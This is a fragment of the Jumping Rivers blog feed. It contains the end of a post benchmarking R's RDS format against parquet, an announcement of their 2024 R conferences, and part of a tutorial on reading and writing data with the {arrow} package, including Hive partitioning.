&lt;li&gt;the time required to load the file.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I’m also a firm believer in keeping things stable and simple. So if both
methods are roughly the same, or even if parquet is a little better, then I
would stick with R’s binary format. Consequently, I don’t really care
about a few MBs or seconds.&lt;/p&gt;
&lt;h4 id="reading-and-writing-the-data"&gt;Reading and writing the data&lt;/h4&gt;
&lt;p&gt;To save the taxi data subset, we use &lt;code&gt;saveRDS()&lt;/code&gt; for the RDS format and
&lt;code&gt;write_parquet()&lt;/code&gt; for the parquet format. The default compression method
used by RDS is &lt;a href="https://en.wikipedia.org/wiki/Gzip" rel="external"&gt;&lt;code&gt;gzip&lt;/code&gt;&lt;/a&gt;, whereas
parquet uses
&lt;a href="https://en.wikipedia.org/wiki/Snappy_%28compression%29" rel="external"&gt;&lt;code&gt;snappy&lt;/code&gt;&lt;/a&gt;. As you
might guess, the &lt;code&gt;gzip&lt;/code&gt; method produces smaller files, but takes longer.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;saveRDS&lt;/span&gt;(taxi_subset, file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;taxi.rds&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Default parquet compression is &amp;#34;snappy&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tf1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempfile&lt;/span&gt;(fileext &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.parquet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_parquet&lt;/span&gt;(taxi_subset, sink &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tf1, compression &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;snappy&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tf2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempfile&lt;/span&gt;(fileext &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.gzip.parquet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_parquet&lt;/span&gt;(taxi_subset, sink &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tf2, compression &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;gzip&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Reading in either file type is also straightforward&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;readRDS&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;taxi.rds&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Need to use collect() to make comparison fair&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;open_dataset&lt;/span&gt;(file_path) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;collect&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="results"&gt;Results&lt;/h3&gt;
&lt;p&gt;Each test was run a couple of times, and the average is given in the
table below. The read times and size were fairly deterministic, but the
write times had massive variability.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr class="header"&gt;
&lt;th&gt;Method&lt;/th&gt;
&lt;th&gt;Compression&lt;/th&gt;
&lt;th&gt;Size (MB)&lt;/th&gt;
&lt;th&gt;Write Time (s)&lt;/th&gt;
&lt;th&gt;Read Time (s)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr class="odd"&gt;
&lt;td&gt;RDS&lt;/td&gt;
&lt;td&gt;gzip&lt;/td&gt;
&lt;td&gt;115&lt;/td&gt;
&lt;td&gt;27&lt;/td&gt;
&lt;td&gt;5.7&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td&gt;Parquet&lt;/td&gt;
&lt;td&gt;snappy&lt;/td&gt;
&lt;td&gt;143&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;0.3&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="odd"&gt;
&lt;td&gt;Parquet&lt;/td&gt;
&lt;td&gt;gzip&lt;/td&gt;
&lt;td&gt;105&lt;/td&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;0.4&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;For me the results suggest that for files of this size, I would consider
using the native binary R format only if&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;the file writing and reading times weren’t an issue;&lt;/li&gt;
&lt;li&gt;and/or using the native binary R format (and the implied stability)
was really important.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;However, parquet and {arrow} do look appealing.&lt;/p&gt;
&lt;h3 id="when-should-we-use-parquet-over-rds"&gt;When Should we use Parquet over RDS?&lt;/h3&gt;
&lt;p&gt;The above timings are for a particular size data set (110MB). However, a
few quick experiments show the performance improvement is fairly
consistent for different file sizes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Writing (parquet vs rds): around 6 times faster using snappy, and
twice as fast using gzip;&lt;/li&gt;
&lt;li&gt;Reading (parquet vs rds): around 16 times faster using parquet.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So to answer the question, when should we use parquet over rds? For me
that depends. If it was for a standard analysis, and the files were
fairly modest (less than 20 MB), I would probably just go for an RDS
file. However, if I had a Shiny application, then this would
significantly lower the threshold where I would use parquet, for the
simple reason that &lt;a href="https://www.jumpingrivers.com/blog/improving-responsiveness-shiny-applications/" rel="external"&gt;one second on a web
application&lt;/a&gt;
feels like a lifetime. Remember that if you are using
&lt;a href="https://pins.rstudio.com/" rel="external"&gt;{pins}&lt;/a&gt;, then &lt;code&gt;pin_write()&lt;/code&gt; can handle
parquet files without any issue.&lt;/p&gt;
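&lt;p&gt;As a minimal sketch of that workflow (assuming {pins} is installed along with the parquet backend it needs; the temporary board and the pin name &lt;code&gt;mtcars-demo&lt;/code&gt; are made up for illustration), a data frame can be pinned as parquet and read back:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;pins&amp;#34;)
# A throwaway board in a temporary directory (illustrative only)
board = board_temp()
# type = &amp;#34;parquet&amp;#34; stores the pin as a parquet file instead of the default rds
pin_write(board, mtcars, name = &amp;#34;mtcars-demo&amp;#34;, type = &amp;#34;parquet&amp;#34;)
# Reading the pin back gives a data frame with the same number of rows
pinned = pin_read(board, &amp;#34;mtcars-demo&amp;#34;)
nrow(pinned) == nrow(mtcars)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In a real application the temporary board would be swapped for whichever board you already use.&lt;/p&gt;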
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/arrow-rds-parquet-comparison/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Events at Jumping Rivers 2024</title><link>https://www.jumpingrivers.com/blog/events-at-jr-2024/</link><pubDate>Thu, 25 Jan 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/events-at-jr-2024/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/events-at-jr-2024/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/events-at-jr-2024/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="satrdays-london-2024"&gt;SatRdays London 2024&lt;/h3&gt;
&lt;p&gt;Once again, we&amp;rsquo;re partnering up with &lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;CUSP London&lt;/a&gt; to bring you a day of R themed talks in the centre of the UK capital. We&amp;rsquo;ll be returning to the amazing &lt;a href="https://en.wikipedia.org/wiki/Bush_House" rel="external"&gt;Bush House&lt;/a&gt; to hear experts in all things R share their knowledge and experience. The day is a great opportunity to meet like-minded data science enthusiasts - whether you&amp;rsquo;re brand new to R and data science, or been working in the field for years, the wide range of talks and networking opportunities make this a conference for all.&lt;/p&gt;
&lt;p&gt;Still not sure? Take a look at some of &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKLNjt5NnVQ1RgEKeayVVv6G&amp;amp;si=mX9q3hBXioCPuNta" rel="external"&gt;last year&amp;rsquo;s talks on our YouTube channel&lt;/a&gt;! We recently closed for abstract submissions, so watch this space, as we&amp;rsquo;ll be releasing the final speaker lineup soon! Head over to the &lt;a href="https://satrdays-london-2024.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt; for more details, and to register!&lt;/p&gt;
&lt;h3 id="shiny-in-production-2024"&gt;Shiny in Production 2024&lt;/h3&gt;
&lt;p&gt;Shiny in Production is returning in 2024, and we&amp;rsquo;re looking forward to bringing you a wide range of speakers and workshops on all things Shiny (as well as other web-based R and visualisation themes)! We recently released the &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJcO4Srr6mnQorL3wFhiV7t&amp;amp;si=oxLAmWkzzTC8rhV-" rel="external"&gt;recordings of last year&amp;rsquo;s talks on YouTube&lt;/a&gt;, so head over to see what you can expect!&lt;/p&gt;
&lt;img src="everyone.jpg" alt="Line up of speakers from Shiny in Production 2023, all look happy and are holding brown gift bags. From left to right: Back row - Chris Brownlie, Colin Gillespie, Cara Thompson, Andrie de Vries, Liam Kalita, George Stagg; Front row - Janion Nevill, Anna Skrzydło, Clareece Nevill, Naomi Bradbury, Russ Hyde, Tan Ho." style="width: 600px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;We&amp;rsquo;re currently accepting abstracts for next year&amp;rsquo;s Shiny in Production! If you want to get involved, head over to the &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt; to submit your work!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/events-at-jr-2024/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Reading and Writing Data with {arrow}</title><link>https://www.jumpingrivers.com/blog/arrow-reading-writing-feather-hive-parquet/</link><pubDate>Thu, 18 Jan 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/arrow-reading-writing-feather-hive-parquet/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/arrow-reading-writing-feather-hive-parquet/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/arrow-reading-writing-feather-hive-parquet/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part of a series of related posts on Apache Arrow. Other posts
in the series are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/" rel="external"&gt;Understanding the Parquet file
format&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Reading and Writing Data with {arrow} (This post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/arrow-rds-parquet-comparison/" rel="external"&gt;Parquet vs the RDS Format&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="what-is-apache-arrow"&gt;What is (Apache) Arrow?&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://arrow.apache.org/" rel="external"&gt;Apache Arrow&lt;/a&gt; is a cross-language
development platform for in-memory data. As it’s in-memory (as opposed
to data stored on disk), it provides additional speed boosts. It’s
designed for efficient analytic operations, and uses a standardised
language-independent columnar memory format for flat and hierarchical
data. The {arrow} R package provides an interface to the &lt;a href="https://github.com/apache/arrow" rel="external"&gt;‘Arrow C++’
library&lt;/a&gt; - an efficient package for
analytic operations on modern hardware.&lt;/p&gt;
&lt;p&gt;There are many great tutorials on using
&lt;a href="https://github.com/apache/arrow" rel="external"&gt;{arrow}&lt;/a&gt; (see the links at the bottom
of the post for example). The purpose of this blog post isn’t to simply
reproduce a few examples, but to understand some of what’s happening
behind the scenes. In this particular post, we’re interested in
understanding the reading/writing aspects of {arrow}.&lt;/p&gt;
&lt;h3 id="getting-started"&gt;Getting started&lt;/h3&gt;
&lt;p&gt;The R package is installed from CRAN in the usual way&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;arrow&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then loaded using&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;arrow&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This blog post uses the &lt;a href="https://www.nyc.gov/site/tlc/about/raw-data.page" rel="external"&gt;NYC Taxi
data&lt;/a&gt;. It’s pretty
big - around 40GB in total. To download it locally, run&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data_nyc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;data/nyc-taxi&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;open_dataset&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;s3://voltrondata-labs-datasets/nyc-taxi&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(year &lt;span style="color:#ff7b72;font-weight:bold"&gt;%in%&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2012&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2021&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_dataset&lt;/span&gt;(data_nyc, partitioning &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;month&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Once this has completed, you can check everything has downloaded
correctly by running&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;nrow&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;open_dataset&lt;/span&gt;(data_nyc))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 1150352666&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3 id="loading-in-data"&gt;Loading in data&lt;/h3&gt;
&lt;p&gt;Unsurprisingly, the first command we come across is &lt;code&gt;open_dataset()&lt;/code&gt;.
This opens the data and (sort of) reads it in.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;arrow&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;open_dataset&lt;/span&gt;(data_nyc)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## FileSystemDataset with 120 Parquet files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## vendor_name: string&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## pickup_datetime: timestamp[ms]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## dropoff_datetime: timestamp[ms]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## passenger_count: int64&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## trip_distance: double&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Reading is a lazy action. This allows us to manipulate much larger data
sets than R could typically deal with. The default print method lists
the columns in the data set, with their associated type. These data
types come directly from the C++ API so don’t always have a
corresponding R type. For example, the &lt;code&gt;year&lt;/code&gt; column is an &lt;code&gt;int32&lt;/code&gt; (a 32
bit integer), whereas &lt;code&gt;passenger_count&lt;/code&gt; is &lt;code&gt;int64&lt;/code&gt; (a 64 bit integer).
In R, these are both integers.&lt;/p&gt;
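&lt;p&gt;To see the laziness in action without downloading the taxi data, here is a small sketch using &lt;code&gt;mtcars&lt;/code&gt; as a stand-in (the directory name &lt;code&gt;mtcars-demo&lt;/code&gt; is made up, and {dplyr} is assumed to be installed). Nothing is read into memory until &lt;code&gt;collect()&lt;/code&gt; is called:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;arrow&amp;#34;)
# A small stand-in for the taxi data (demo_dir is a made-up location)
demo_dir = file.path(tempdir(), &amp;#34;mtcars-demo&amp;#34;)
write_dataset(mtcars, demo_dir, partitioning = &amp;#34;cyl&amp;#34;)
# No rows are read yet; this only describes the query
query = open_dataset(demo_dir) |&amp;gt;
  dplyr::filter(cyl == 4) |&amp;gt;
  dplyr::select(mpg, wt)
# collect() runs the query and returns a tibble
result = dplyr::collect(query)
nrow(result)
## [1] 11
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Only the rows and columns that survive the filter and select steps end up in R, which is what makes the same pattern workable on data sets far larger than memory.&lt;/p&gt;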
&lt;p&gt;As you might guess, there’s a corresponding function &lt;code&gt;write_dataset()&lt;/code&gt;.
Looking at the (rather good) documentation, we come across a few
concepts that are worth exploring further.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-arrow-reading-writing-feather-hive"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="file-formats"&gt;File formats&lt;/h3&gt;
&lt;p&gt;The main file formats associated with Arrow are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;parquet&lt;/code&gt;: a format designed to minimise storage - see our &lt;a href="https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/" rel="external"&gt;recent
blog
post&lt;/a&gt;
that delves into some of the details surrounding the format;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;arrow&lt;/code&gt;/&lt;code&gt;feather&lt;/code&gt;: in-memory format created to optimise vectorised
computations;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;csv&lt;/code&gt;: the world runs on csv files (and Excel).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A common workflow is to store your data as parquet files. The Arrow
library then loads the data and processes it in the arrow format.&lt;/p&gt;
&lt;h4 id="storing-data-in-the-arrow-format"&gt;Storing data in the Arrow format&lt;/h4&gt;
&lt;p&gt;The obvious thought (to me at least) was, why not store the data as
arrow? Ignoring for the moment that Arrow &lt;a href="https://arrow.apache.org/faq/" rel="external"&gt;doesn’t
promise&lt;/a&gt; long-term archival storage using
the arrow format, we can do a few tests.&lt;/p&gt;
&lt;p&gt;Using the NYC-taxi data, we can create a quick subset&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Replace format = &amp;#34;arrow&amp;#34; with format = &amp;#34;parquet&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# to create the corresponding&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# parquet equivalent&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;open_dataset&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;file.path&lt;/span&gt;(data_nyc, &lt;span style="color:#a5d6ff"&gt;&amp;#34;year=2019&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_dataset&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/nyc-taxi-arrow&amp;#34;&lt;/span&gt;, partitioning &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;month&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; format &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;arrow&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A very quick, but not particularly thorough test suggests that&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the arrow format requires ten times more storage space. So for the
entire &lt;code&gt;nyc-taxi&lt;/code&gt; data set, parquet takes around 38GB, but arrow
would take around 380GB.&lt;/li&gt;
&lt;li&gt;storing as arrow makes some operations quicker. For the few examples I
tried, there was around a 10% increase in speed.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The large storage penalty was enough to convince me of the merits of
storing data as parquet, but there may be some niche situations where
you might switch.&lt;/p&gt;
&lt;h4 id="hive-partitioning"&gt;Hive partitioning&lt;/h4&gt;
&lt;p&gt;Both &lt;code&gt;open_dataset()&lt;/code&gt; and &lt;code&gt;write_dataset()&lt;/code&gt; functions mention “Hive
partitioning” - in fact we sneakily included a &lt;code&gt;partitioning&lt;/code&gt; argument in
the code above. The &lt;code&gt;open_dataset()&lt;/code&gt; function guesses whether
Hive partitioning is in use, whereas for the &lt;code&gt;write_dataset()&lt;/code&gt; function we
specify the partitioning ourselves. But what actually is it?&lt;/p&gt;
&lt;p&gt;Hive partitioning is a method used to split a table into multiple files
based on partition keys. A partition key is a variable of interest in
your data, for example, year or month. The files are then organised in
folders. Within each folder, the value of the &lt;strong&gt;key&lt;/strong&gt; is determined by
the name of the folder. By partitioning the data in this way, we can
make it faster to do queries on data slices.&lt;/p&gt;
&lt;p&gt;Suppose we wanted to partition the data by year, then the file structure
would be&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;taxi-data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;year&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2018&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file1.parquet
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file2.parquet
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;year&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2019&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file4.parquet
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file5.parquet
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Of course, we can partition by more than one variable, such as both year
&lt;strong&gt;and&lt;/strong&gt; month&lt;/p&gt;
